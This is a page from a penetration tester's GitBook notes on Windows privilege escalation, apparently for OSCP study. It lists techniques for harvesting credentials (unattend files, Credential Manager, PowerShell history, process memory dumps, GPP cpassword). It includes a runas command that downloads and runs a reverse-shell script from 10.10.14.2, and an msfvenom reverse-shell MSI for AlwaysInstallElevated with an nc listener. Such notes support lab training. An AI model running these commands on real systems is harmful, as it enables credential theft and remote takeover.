M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • Unnattended Installation
  • Windows Credential Manager
  • PowerShell History
  • Process Memory
  • Registry Autoruns
  • Enumeration
  • ACLS
  • SYSVOL & GPP (MS14-025)
  • AlwayInstalled
  1. NOTES
  2. PRIVILEGE ESCALATION

Windows

Unnattended Installation

Unattend.xml is an answer file for installation. The files may contain encoded or plain-text credentials and other sensitive information.

These files contain base64-encoded user account and system information

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Autounattend.xml

Windows Credential Manager

In the production server for some operation, an admin requires to enter the credentials repeatedly. Also, users save their credentials to the Credential Manager for quick access. Credential manager stores Web and Windows Credentials.

Assume that for a moment an attacker got access to the system physically or remotely. Then, it would be easy to access those credentials and to run an application with it.

For checking al the stored credentials:

cmdkey /list

We will not see the password, but we can use runas to authenticate as the user which have credentials:

runas.exe /savecred /user:administrator cmd

// Hosting Nishang shell
runas.exe /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/rev.ps1')"

PowerShell History

PowerShell.exe terminal stores all the PS commands history in a text file. When an administrator has used hard-coded credentials to perform any operation on the regular user i.e student user environment using PowerShell then, it would become necessary to clean the PowerShell command history. If an administrator forgets to clean up the history, then the admin user has exposed some sensitive information like credentials, configuration settings, etc.

The default location for the PowerShell command history:

C:\Users\Test\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Process Memory

To check the processes running:

ps

Then you can dump all the proccess information:

// Search the pid
ps | findstr "<process>"

.\procdump64.exe -accepteula -ma <id>

Then use strings to check passwords:

strings <file> | grep pass

Registry Autoruns

Autoruns for system startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunREG

Autoruns for user login

HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Configurations for Windows Services which can run with elevated privileges

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Enumeration

To check the programs which are configured to start on system startup:

Get-ACL -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' |
Format-List

If a normal user haves Full Control we can use as a privilege escalation technique

ACLS

We can check for ACL misconfigurations using icacls

icacls /path

If we have Full controll against a folder, we can grant this user permissions for accessing a file inside this folder using this command:

icacls file /grant user:f

SYSVOL & GPP (MS14-025)

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
gpp-decrypt "password"

AlwayInstalled

Enumerate common registry keys and if AlwaysInstallElevated is enabled we can exploit that

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Create a msfvenom payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> lport=<port>-a x64 --platform windows -f msi -o ignite.msi

Upload the .msi file to the machine, open a listener and execute:

nc -nvlp <port>
msiexec /quiet /qn /i ignite.msi
PreviousPRIVILEGE ESCALATIONNextEnumeration

Last updated 19 days ago